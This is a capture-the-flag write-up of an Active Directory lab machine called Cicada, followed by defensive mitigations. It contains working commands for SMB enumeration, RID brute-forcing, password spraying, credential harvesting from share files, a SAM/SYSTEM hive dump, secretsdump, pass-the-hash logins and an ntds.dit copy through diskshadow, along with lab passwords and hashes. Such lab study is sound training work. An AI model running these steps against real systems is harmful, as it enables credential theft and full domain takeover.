Introduction#

This is Cicada, a Windows Active Directory machine which attack path involves enumerating SMB shares to find a default password in a welcome note, performing RID cycling to discover usernames, and password spraying to find a user still using the default credentials. After gaining a foothold with one user, LDAP enumeration reveals a password stored in another user’s description. That user has access to a DEV share containing a backup script, which leaks further credentials. Finally, the SeBackupPrivilege is exploited to dump hashes and achieve domain administrator access.

Reconnaissance#

Nmap Scan#

An initial scan reveals a typical Windows Domain Controller with ports like 53 (DNS), 88 (Kerberos), 389 (LDAP), and 445 (SMB) open. We note the domain name cicada.htb and the hostname CICADA-DC, and add them to our /etc/hosts file.

Nmap Scan Results:

1
$ nmap -p- -sCV --min-rate 10000 10.10.11.30
2

3
PORT      STATE SERVICE       VERSION
4
53/tcp    open  domain        Simple DNS Plus
5
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-27 01:58:30Z)
6
135/tcp   open  msrpc         Microsoft Windows RPC
7
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
8
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
9
|_ssl-date: TLS randomness does not represent time
10
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
11
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
12
| Not valid before: 2024-08-22T20:24:16
13
|_Not valid after:  2025-08-22T20:24:16
14
445/tcp   open  microsoft-ds?
15
464/tcp   open  kpasswd5?
16
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
17
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
18
|_ssl-date: TLS randomness does not represent time
19
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
20
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
21
| Not valid before: 2024-08-22T20:24:16
22
|_Not valid after:  2025-08-22T20:24:16
23
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
24
|_ssl-date: TLS randomness does not represent time
25
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
26
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
27
| Not valid before: 2024-08-22T20:24:16
28
|_Not valid after:  2025-08-22T20:24:16
29
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
30
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
31
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::, DNS:CICADA-DC.cicada.htb
32
| Not valid before: 2024-08-22T20:24:16
33
|_Not valid after:  2025-08-22T20:24:16
34
|_ssl-date: TLS randomness does not represent time
35
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
36
|_http-title: Not Found
37
|_http-server-header: Microsoft-HTTPAPI/2.0
38
54296/tcp open  msrpc         Microsoft Windows RPC
39
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
40

41
Host script results:
42
| smb2-security-mode:
43
|   3:1:1:
44
|_  Message signing enabled and required
45
|_clock-skew: 7h00m08s
46
| smb2-time:
47
|   date: 2024-09-27T01:59:20
48
|_  start_date: N/A

Adding Domain and Hostname to /etc/hosts:

1
10.10.11.30    CICADA-DC cicada.htb CICADA-DC.cicada.htb

Key Ports and Services Analysis:

SMB (445): A potential source of files if anonymous access is allowed.
LDAP (389): Could reveal usernames and passwords if anonymous access is permitted.
DNS (53): Possible to brute force subdomains.
WinRM (5985): Will provide a shell if valid credentials are found.

Gaining a Foothold#

Anonymous SMB Access#

We can access SMB shares anonymously using the guest account with an empty password.

1
# Enumerating SMB shares as guest
2
$ netexec smb CICADA-DC -u guest -p '' --shares
3
SMB         10.10.11.30    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
4
SMB         10.10.11.30    445    CICADA-DC        [+] cicada.htb\\guest:
5
SMB         10.10.11.30    445    CICADA-DC        [*] Enumerated shares
6
SMB         10.10.11.30    445    CICADA-DC        Share           Permissions     Remark
7
SMB         10.10.11.30    445    CICADA-DC        -----           -----------     ------
8
SMB         10.10.11.30    445    CICADA-DC        ADMIN$                          Remote Admin
9
SMB         10.10.11.30    445    CICADA-DC        C$                              Default share
10
SMB         10.10.11.30    445    CICADA-DC        DEV
11
SMB         10.10.11.30    445    CICADA-DC        HR              READ
12
SMB         10.10.11.30    445    CICADA-DC        IPC$            READ            Remote IPC
13
SMB         10.10.11.30    445    CICADA-DC        NETLOGON                        Logon server share
14
SMB         10.10.11.30    445    CICADA-DC        SYSVOL                          Logon server share

Share Analysis Diagram:

1
SMB Shares on 10.10.11.30
2
+-----------------------+-----------------------------+
3
| Share Name            | Permissions / Notes         |
4
+-----------------------+-----------------------------+
5
| ADMIN$, C$            | Default admin shares (inaccessible) |
6
| IPC$                  | READ (inter-process communication) |
7
| NETLOGON, SYSVOL      | Standard DC shares           |
8
| HR                    | READ (accessible!)           |
9
| DEV                   | No access initially          |
10
+-----------------------+-----------------------------+

Finding a Default Password#

The HR share contains a single file, Notice from HR.txt. We download and read it.

1
# Connecting to the HR share and downloading the file
2
$ smbclient -N //10.10.11.30/HR
3
Try "help" to get a list of possible commands.
4
smb: \\> ls
5
  .                                   D        0  Thu Mar 14 08:29:09 2024
6
  ..                                  D        0  Thu Mar 14 08:21:29 2024
7
  Notice from HR.txt                  A     1266  Wed Aug 28 13:31:48 2024
8

9
    4168447 blocks of size 4096. 942184 blocks available
10
smb: \\> get "Notice from HR.txt"
11
getting file \\Notice from HR.txt of size 1266 as Notice from HR.txt (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)
12
smb: \\> exit

Contents of Notice from HR.txt:

1
Dear new hire!
2

3
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our
4
security protocols, it's essential that you change your default password to
5
something unique and secure.
6

7
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
8

9
To change your password:
10

11
1. Log in to your Cicada Corp account** using the provided username and the default
12
password mentioned above.
13
2. Once logged in, navigate to your account settings or profile settings section.
14
3. Look for the option to change your password. This will be labeled as "Change Password".
15
4. Follow the prompts to create a new password**. Make sure your new password is
16
strong, containing a mix of uppercase letters, lowercase letters, numbers, and
17
special characters.
18
5. After changing your password, make sure to save your changes.
19

20
Remember, your password is a crucial aspect of keeping your account secure.
21
Please do not share your password with anyone, and ensure you use a complex
22
password.
23

24
If you encounter any issues or need assistance with changing your password, don't
25
hesitate to reach out to our support team at support@cicada.htb.
26

27
Thank you for your attention to this matter, and once again, welcome to the
28
Cicada Corp team!
29

30
Best regards,
31
Cicada Corp

User Enumeration via RID Cycling#

We perform RID (Relative Identifier) cycling to discover domain usernames. RID cycling involves brute-forcing user IDs against the \\pipe\\lsarpc endpoint.

1
# Performing RID cycling as guest
2
$ netexec smb CICADA-DC -u guest -p '' --rid-brute 10000
3
SMB         10.10.11.30    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
4
SMB         10.10.11.30    445    CICADA-DC        [+] cicada.htb\\guest:
5
SMB         10.10.11.30    445    CICADA-DC        498: CICADA\\Enterprise Read-only Domain Controllers (SidTypeGroup)
6
SMB         10.10.11.30    445    CICADA-DC        500: CICADA\\Administrator (SidTypeUser)
7
SMB         10.10.11.30    445    CICADA-DC        501: CICADA\\Guest (SidTypeUser)
8
SMB         10.10.11.30    445    CICADA-DC        502: CICADA\\krbtgt (SidTypeUser)
9
SMB         10.10.11.30    445    CICADA-DC        512: CICADA\\Domain Admins (SidTypeGroup)
10
SMB         10.10.11.30    445    CICADA-DC        513: CICADA\\Domain Users (SidTypeGroup)
11
SMB         10.10.11.30    445    CICADA-DC        514: CICADA\\Domain Guests (SidTypeGroup)
12
SMB         10.10.11.30    445    CICADA-DC        515: CICADA\\Domain Computers (SidTypeGroup)
13
SMB         10.10.11.30    445    CICADA-DC        516: CICADA\\Domain Controllers (SidTypeGroup)
14
SMB         10.10.11.30    445    CICADA-DC        517: CICADA\\Cert Publishers (SidTypeAlias)
15
SMB         10.10.11.30    445    CICADA-DC        518: CICADA\\Schema Admins (SidTypeGroup)
16
SMB         10.10.11.30    445    CICADA-DC        519: CICADA\\Enterprise Admins (SidTypeGroup)
17
SMB         10.10.11.30    445    CICADA-DC        520: CICADA\\Group Policy Creator Owners (SidTypeGroup)
18
SMB         10.10.11.30    445    CICADA-DC        521: CICADA\\Read-only Domain Controllers (SidTypeGroup)
19
SMB         10.10.11.30    445    CICADA-DC        522: CICADA\\Cloneable Domain Controllers (SidTypeGroup)
20
SMB         10.10.11.30    445    CICADA-DC        525: CICADA\\Protected Users (SidTypeGroup)
21
SMB         10.10.11.30    445    CICADA-DC        526: CICADA\\Key Admins (SidTypeGroup)
22
SMB         10.10.11.30    445    CICADA-DC        527: CICADA\\Enterprise Key Admins (SidTypeGroup)
23
SMB         10.10.11.30    445    CICADA-DC        553: CICADA\\RAS and IAS Servers (SidTypeAlias)
24
SMB         10.10.11.30    445    CICADA-DC        571: CICADA\\Allowed RODC Password Replication Group (SidTypeAlias)
25
SMB         10.10.11.30    445    CICADA-DC        572: CICADA\\Denied RODC Password Replication Group (SidTypeAlias)
26
SMB         10.10.11.30    445    CICADA-DC        1000: CICADA\\CICADA-DC$ (SidTypeUser)
27
SMB         10.10.11.30    445    CICADA-DC        1101: CICADA\\DnsAdmins (SidTypeAlias)
28
SMB         10.10.11.30    445    CICADA-DC        1102: CICADA\\DnsUpdateProxy (SidTypeGroup)
29
SMB         10.10.11.30    445    CICADA-DC        1103: CICADA\\Groups (SidTypeGroup)
30
SMB         10.10.11.30    445    CICADA-DC        1104: CICADA\\john.smoulder (SidTypeUser)
31
SMB         10.10.11.30    445    CICADA-DC        1105: CICADA\\sarah.dantelia (SidTypeUser)
32
SMB         10.10.11.30    445    CICADA-DC        1106: CICADA\\michael.wrightson (SidTypeUser)
33
SMB         10.10.11.30    445    CICADA-DC        1108: CICADA\\david.orelious (SidTypeUser)
34
SMB         10.10.11.30    445    CICADA-DC        1109: CICADA\\Dev Support (SidTypeGroup)
35
SMB         10.10.11.30    445    CICADA-DC        1601: CICADA\\emily.oscars (SidTypeUser)

We filter the output to create a list of domain users:

1
# Extracting usernames from RID cycling output
2
$ netexec smb CICADA-DC -u guest -p '' --rid-brute | grep SidTypeUser | cut -d'\\' -f2 | cut -d' ' -f1 | tee users.txt
3
Administrator
4
Guest
5
krbtgt
6
CICADA-DC$
7
john.smoulder
8
sarah.dantelia
9
michael.wrightson
10
david.orelious
11
emily.oscars

Password Spraying#

We spray the discovered default password against all usernames.

1
# Password spraying with the default password
2
$ netexec smb CICADA-DC -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
3
SMB         10.10.11.30    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
4
SMB         10.10.11.30    445    CICADA-DC        [-] cicada.htb\\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
5
SMB         10.10.11.30    445    CICADA-DC        [-] cicada.htb\\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
6
SMB         10.10.11.30    445    CICADA-DC        [-] cicada.htb\\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
7
SMB         10.10.11.30    445    CICADA-DC        [-] cicada.htb\\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
8
SMB         10.10.11.30    445    CICADA-DC        [-] cicada.htb\\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
9
SMB         10.10.11.30    445    CICADA-DC        [-] cicada.htb\\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
10
SMB         10.10.11.30    445    CICADA-DC        [+] cicada.htb\\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
11
SMB         10.10.11.30    445    CICADA-DC        [-] cicada.htb\\david.orelious:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
12
SMB         10.10.11.30    445    CICADA-DC        [-] cicada.htb\\emily.oscars:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE

The password works for michael.wrightson. We verify access:

1
# Verifying credentials with SMB and LDAP
2
$ netexec smb CICADA-DC -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'
3
SMB         10.10.11.30    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
4
SMB         10.10.11.30    445    CICADA-DC        [+] cicada.htb\\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
5

6
# Confirming LDAP access
7
$ netexec ldap CICADA-DC -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'
8
SMB         10.10.11.30    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
9
LDAP        10.10.11.30    389    CICADA-DC        [+] cicada.htb\\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
10

11
# WinRM access fails (user not in Remote Management group)
12
$ netexec winrm CICADA-DC -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8'
13
WINRM       10.10.11.30    5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
14
WINRM       10.10.11.30    5985   CICADA-DC        [-] cicada.htb\\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

Escalating to `david.orelious`#

Enumerating LDAP for Credentials#

Since michael.wrightson has no additional SMB share access, we turn to LDAP to find more information.

1
# Enumerating all LDAP users
2
$ netexec ldap CICADA-DC -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
3
SMB         10.10.11.30    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
4
LDAP        10.10.11.30    389    CICADA-DC        [+] cicada.htb\\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
5
LDAP        10.10.11.30    389    CICADA-DC        [*] Enumerated 8 domain users: cicada.htb
6
LDAP        10.10.11.30    389    CICADA-DC        -Username-                    -Last PW Set-            -BadPW-  -Description-
7
LDAP        10.10.11.30    389    CICADA-DC        Administrator                 2024-08-26 20:08:03      1        Built-in account for administering the computer/domain
8
LDAP        10.10.11.30    389    CICADA-DC        Guest                         2024-08-28 17:26:56      1        Built-in account for guest access to the computer/domain
9
LDAP        10.10.11.30    389    CICADA-DC        krbtgt                        2024-03-14 11:14:10      1        Key Distribution Center Service Account
10
LDAP        10.10.11.30    389    CICADA-DC        john.smoulder                 2024-03-14 12:17:29      1
11
LDAP        10.10.11.30    389    CICADA-DC        sarah.dantelia                2024-03-14 12:17:29      1
12
LDAP        10.10.11.30    389    CICADA-DC        michael.wrightson             2024-03-14 12:17:29      0
13
LDAP        10.10.11.30    389    CICADA-DC        david.orelious                2024-03-14 12:17:29      1        Just in case I forget my password is aRt$Lp#7t*VQ!3
14
LDAP        10.10.11.30    389    CICADA-DC        emily.oscars                  2024-08-22 21:20:17      1

Critical Finding Visual:

1
+---------------------+---------------------------------------------+
2
| User                | Description                                 |
3
+---------------------+---------------------------------------------+
4
| michael.wrightson   | (none)                                      |
5
| david.orelious      | Just in case I forget my password is        |
6
|                     | aRt$Lp#7t*VQ!3                              |
7
| emily.oscars        | (none)                                      |
8
+---------------------+---------------------------------------------+

The david.orelious user’s description contains a password: aRt$Lp#7t*VQ!3. We validate these credentials:

1
# Validating david.orelious credentials over SMB and LDAP
2
$ netexec smb CICADA-DC -u david.orelious -p 'aRt$Lp#7t*VQ!3'
3
SMB         10.10.11.30    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
4
SMB         10.10.11.30    445    CICADA-DC        [+] cicada.htb\\david.orelious:aRt$Lp#7t*VQ!3
5

6
$ netexec ldap CICADA-DC -u david.orelious -p 'aRt$Lp#7t*VQ!3'
7
SMB         10.10.11.30    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
8
LDAP        10.10.11.30    389    CICADA-DC        [+] cicada.htb\\david.orelious:aRt$Lp#7t*VQ!3
9

10
# WinRM still fails for this user
11
$ netexec winrm CICADA-DC -u david.orelious -p 'aRt$Lp#7t*VQ!3'
12
WINRM       10.10.11.30    5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
13
WINRM       10.10.11.30    5985   CICADA-DC        [-] cicada.htb\\david.orelious:aRt$Lp#7t*VQ!3

Unlike previous users, david.orelious has read access to the DEV share.

1
# Enumerating shares as david.orelious
2
$ netexec smb CICADA-DC -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
3
SMB         10.10.11.30    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
4
SMB         10.10.11.30    445    CICADA-DC        [+] cicada.htb\\david.orelious:aRt$Lp#7t*VQ!3
5
SMB         10.10.11.30    445    CICADA-DC        [*] Enumerated shares
6
SMB         10.10.11.30    445    CICADA-DC        Share           Permissions     Remark
7
SMB         10.10.11.30    445    CICADA-DC        -----           -----------     ------
8
SMB         10.10.11.30    445    CICADA-DC        ADMIN$                          Remote Admin
9
SMB         10.10.11.30    445    CICADA-DC        C$                              Default share
10
SMB         10.10.11.30    445    CICADA-DC        DEV             READ
11
SMB         10.10.11.30    445    CICADA-DC        HR              READ
12
SMB         10.10.11.30    445    CICADA-DC        IPC$            READ            Remote IPC
13
SMB         10.10.11.30    445    CICADA-DC        NETLOGON        READ            Logon server share
14
SMB         10.10.11.30    445    CICADA-DC        SYSVOL          READ            Logon server share

We connect and download the Backup_script.ps1 file.

1
# Connecting to DEV share and downloading the backup script
2
$ smbclient -U david.orelious //CICADA-DC/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
3
Try "help" to get a list of possible commands.
4
smb: \\> ls
5
  .                                   D        0  Thu Mar 14 08:31:39 2024
6
  ..                                  D        0  Thu Mar 14 08:21:29 2024
7
  Backup_script.ps1                   A      601  Wed Aug 28 13:28:22 2024
8

9
    4168447 blocks of size 4096. 934318 blocks available
10
smb: \\> get Backup_script.ps1
11
getting file \\Backup_script.ps1 of size 601 as Backup_script.ps1 (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
12
smb: \\> exit

Backup_script.ps1 Contents Visualized as a Code Block:

1
$sourceDirectory = "C:\\smb"
2
$destinationDirectory = "D:\\Backup"
3

4
$username = "emily.oscars"
5
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
6
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
7

8
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
9
$backupFileName = "smb_backup_$dateStamp.zip"
10
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
11

12
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
13

14
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

Key Finding:

1
+----------------------+------------------------------+
2
| Variable             | Value                        |
3
+----------------------+------------------------------+
4
| Username             | emily.oscars                 |
5
| Password (plaintext) | Q!3@Lp#M6b*7t*Vt             |
6
+----------------------+------------------------------+

Shell as `emily.oscars`#

Validating Credentials and Accessing WinRM#

The credentials found in the script are valid and grant WinRM access.

1
# Validating emily.oscars credentials
2
$ netexec smb CICADA-DC -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
3
SMB         10.10.11.30    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
4
SMB         10.10.11.30    445    CICADA-DC        [+] cicada.htb\\emily.oscars:Q!3@Lp#M6b*7t*Vt
5

6
# Confirming WinRM access
7
$ netexec winrm CICADA-DC -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
8
WINRM       10.10.11.30    5985   CICADA-DC        [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
9
WINRM       10.10.11.30    5985   CICADA-DC        [+] cicada.htb\\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)

We connect using Evil-WinRM and retrieve the user flag.

1
# Establishing a shell as emily.oscars
2
$ evil-winrm -i cicada.htb -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt'
3

4
Evil-WinRM shell v3.5
5

6
Info: Establishing connection to remote endpoint
7
*Evil-WinRM* PS C:\\Users\\emily.oscars.CICADA\\Documents>
8

9
# Reading user flag
10
*Evil-WinRM* PS C:\\Users\\emily.oscars.CICADA\\desktop> type user.txt
11
ea4481e2************************

Credentials Chain Summary:

1
1. Default Password from HR Note: Cicada$M6Corpb*@Lp#nZp!8
2
   -> Valid for: michael.wrightson (SMB/LDAP only, no WinRM)
3
2. LDAP Description of david.orelious: aRt$Lp#7t*VQ!3
4
   -> Valid for: david.orelious (SMB/LDAP only, DEV share access)
5
3. Password in Backup_script.ps1: Q!3@Lp#M6b*7t*Vt
6
   -> Valid for: emily.oscars (SMB + WinRM Access!)

Privilege Escalation via `SeBackupPrivilege`#

Identifying the Privilege#

emily.oscars is a member of the Backup Operators group, which grants SeBackupPrivilege.

1
# Checking group membership
2
*Evil-WinRM* PS C:\\> net user emily.oscars
3
User name                    emily.oscars
4
Full Name                    Emily Oscars
5
Comment                      User's comment
6
Country/region code          000 (System Default)
7
Account active               Yes
8
Account expires              Never
9

10
Password last set            8/22/2024 2:20:17 PM
11
Password expires             Never
12
Password changeable          8/23/2024 2:20:17 PM
13
Password required            Yes
14
User may change password     Yes
15

16
Workstations allowed         All
17
Logon script
18
User profile
19
Home directory
20
Last logon                   Never
21

22
Logon hours allowed          All
23

24
Local Group Memberships      *Backup Operators     *Remote Management Use
25
Global Group memberships     *Domain Users
26
The command completed successfully.

1
# Listing privileges
2
*Evil-WinRM* PS C:\\> whoami /priv
3

4
PRIVILEGES INFORMATION
5
----------------------
6

7
Privilege Name                  Description                               State
8
=============================   ======================================   =======
9
SeBackupPrivilege               Back up files and directories            Enabled
10
SeRestorePrivilege              Restore files and directories            Enabled
11
SeShutdownPrivilege             Shut down the system                     Enabled
12
SeChangeNotifyPrivilege         Bypass traverse checking                 Enabled
13
SeIncreaseWorkingSetPrivilege   Increase a process working set            Enabled

Privilege Exploitation Path Diagram:

1
                   +-----------------------------+
2
                   | SeBackupPrivilege Enabled   |
3
                   +-----------------------------+
4
                                  |
5
          +-----------------------+-----------------------+
6
          |                                               |
7
+---------v----------+                       +------------v----------+
8
| Method 1: Registry |                       | Method 2: NetExec/    |
9
| Dump (reg save)    |                       | Impacket Automation   |
10
+--------------------+                       +-----------------------+
11
          |                                               |
12
          v                                               v
13
   Dump SAM & SYSTEM                      Use reg.py or nxc to dump
14
   to local files                         ntds.dit remotely
15
          |                                               |
16
          +-----------------------+-----------------------+
17
                                  |
18
                                  v
19
                     Extract Administrator Hash
20
                     via secretsdump.py
21
                                  |
22
                                  v
23
                     Evil-WinRM as Administrator

Exploiting via Registry Dump (Method 1 — Simple)#

We save the SAM and SYSTEM registry hives and download them.

1
# Saving registry hives
2
*Evil-WinRM* PS C:\\programdata> reg save hklm\\sam sam
3
The operation completed successfully.
4
*Evil-WinRM* PS C:\\programdata> reg save hklm\\system system
5
The operation completed successfully.
6

7
# Downloading the hive files
8
*Evil-WinRM* PS C:\\programdata> download sam
9
Info: Downloading C:\\programdata\\sam to sam
10
Info: Download successful!
11
*Evil-WinRM* PS C:\\programdata> download system
12
Info: Downloading C:\\programdata\\system to system
13
Info: Download successful!

On our local machine, we use secretsdump.py to extract the Administrator hash:

1
# Dumping local hashes from saved registry hives
2
$ secretsdump.py -sam sam -system system LOCAL
3
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
4

5
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
7
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
8
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
9
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
10
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
11
[*] Cleaning up...

Escalating to Administrator#

We use the extracted hash to get a shell as Administrator and read the root flag.

1
# Authenticating with the Administrator hash
2
$ netexec smb CICADA-DC -u administrator -H aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341
3
SMB         10.10.11.30    445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
4
SMB         10.10.11.30    445    CICADA-DC        [+] cicada.htb\\administrator:2b87e7c93a3e8a0ea4a581937016f341 (Pwn3d!)
5

6
# Connecting with Evil-WinRM using the hash
7
$ evil-winrm -i cicada.htb -u administrator -H 2b87e7c93a3e8a0ea4a581937016f341
8

9
Evil-WinRM shell v3.5
10

11
Info: Establishing connection to remote endpoint
12
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents>
13

14
# Reading root flag
15
*Evil-WinRM* PS C:\\Users\\Administrator\\desktop> type root.txt
16
b77facd8************************

Beyond Root — Dumping Domain Hashes (Optional)#

For a complete compromise, we can also dump domain hashes from ntds.dit. This requires using diskshadow to create a shadow copy of the C: drive because the file is locked by Active Directory.

1
# Step 1: Create the diskshadow script
2
# (On attacker machine, create a file called 'backup' with the following content)
3
set verbose on
4
set metadata C:\\Windows\\Temp\\0xdf.cab
5
set context clientaccessible
6
begin backup
7
add volume C: alias cdrive
8
create
9
expose %cdrive% E:
10
end backup

1
# Convert script to DOS format
2
$ unix2dos backup

1
# Step 2: Upload and run diskshadow
2
*Evil-WinRM* PS C:\\programdata> diskshadow /s backup
3
Microsoft DiskShadow version 1.0
4
Copyright (C) 2013 Microsoft Corporation
5
On computer: CICADA-DC, 9/27/2024 1:07:11 AM
6

7
-> set verbose on
8
-> set metadata C:\\Windows\\Temp\\0xdf.cab
9
-> set context clientaccessible
10
-> begin backup
11
-> add volume C: alias cdrive
12
-> create
13
Component "\\BCD\\BCD" from writer "ASR Writer" is excluded from backup,
14
because it requires volume which is not in the shadow copy set.
15
The writer "ASR Writer" is now entirely excluded from the backup because
16
the top-level non selectable component "\\BCD\\BCD" is excluded.
17
* Including writer "Task Scheduler Writer":
18
+ Adding component: \\TasksStore
19
* Including writer "VSS Metadata Store Writer":
20
+ Adding component: \\WriterMetadataStore
21
* Including writer "Performance Counters Writer":
22
+ Adding component: \\...
23
...

1
# Step 3: Copy ntds.dit from the exposed E: drive
2
Copy-FileSeBackupPrivilege E:\\Windows\\NTDS\\ntds.dit C:\\programdata\\ntds.dit
3

4
# Step 4: Download SAM and SYSTEM hives
5
reg save HKLM\\SYSTEM C:\\programdata\\SYSTEM.SAV
6
reg save HKLM\\SAM C:\\programdata\\SAM.SAV

1
# Step 5: Dump all domain hashes
2
$ secretsdump.py -sam SAM.SAV -system SYSTEM.SAV -ntds ntds.dit LOCAL

Domain Hashes Visualization:

1
Extracted Domain Hashes:
2
+---------------------+---------------------------------------------------+
3
| User                | NTLM Hash                                        |
4
+---------------------+---------------------------------------------------+
5
| Administrator       | 2b87e7c93a3e8a0ea4a581937016f341                 |
6
| Guest               | 31d6cfe0d16ae931b73c59d7e0c089c0                 |
7
| CICADA-DC$          | 188c2f3cb7592e18d1eae37991dee696                 |
8
| krbtgt              | 3779000802a4bb402736bee52963f8ef                 |
9
| john.smoulder        | 0d33a055d07e231ce088a91975f28dc4                 |
10
| sarah.dantelia      | d1c88b5c2ecc0e2679000c5c73baea20                 |
11
| michael.wrightson   | b222964c9f247e6b225ce9e7c4276776                 |
12
| david.orelious      | ef0bcbf3577b729dcfa6fbe1731d5a43                 |
13
| emily.oscars        | 559048ab2d168a4edf8e033d43165ee5                 |
14
+---------------------+---------------------------------------------------+

Cleanup and Defensive Countermeasures#

Summary of Attack Path#

Reconnaissance: Nmap scan identified open ports and services.
SMB Enumeration: Anonymous access to HR share revealed default password.
RID Cycling: Identified valid domain usernames.
Password Spraying: Found michael.wrightson was still using the default password.
LDAP Enumeration: Discovered david.orelious’s password in his description field.
SMB Access: david.orelious could read the DEV share, which contained a backup script.
Script Analysis: Extracted emily.oscars’ credentials from the script.
WinRM Access: emily.oscars had WinRM access and SeBackupPrivilege.
Privilege Escalation: Dumped SAM/SYSTEM hives to extract Administrator NTLM hash.
Full Compromise: Used the hash to log in as Administrator.

Mitigations#

Remove default credentials immediately: Enforce password changes upon first login.
Never store passwords in plaintext: Use secure vaults or proper secrets management.
Restrict SMB share access: Apply principle of least privilege.
Monitor LDAP descriptions: Ensure no sensitive data is stored in user attributes.
Review Backup Operators membership: Limit this group to required accounts only.
Enable logging and alerting: Monitor for suspicious SMB enumeration and registry access.

Conclusion#

